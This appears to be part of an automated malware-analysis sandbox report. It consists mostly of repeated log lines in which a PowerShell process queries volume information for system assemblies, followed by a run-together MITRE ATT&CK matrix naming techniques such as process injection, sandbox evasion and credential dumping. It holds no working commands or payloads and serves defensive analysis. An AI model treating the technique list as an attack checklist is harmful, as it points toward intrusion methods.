Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Spearphishing Link1Command and Scripting Interpreter1DLL Side-Loading1Process Injection11Masquerading1OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScripting211Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemorySecurity Software Discovery11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerVirtualization/Sandbox Evasion3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonScripting211Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
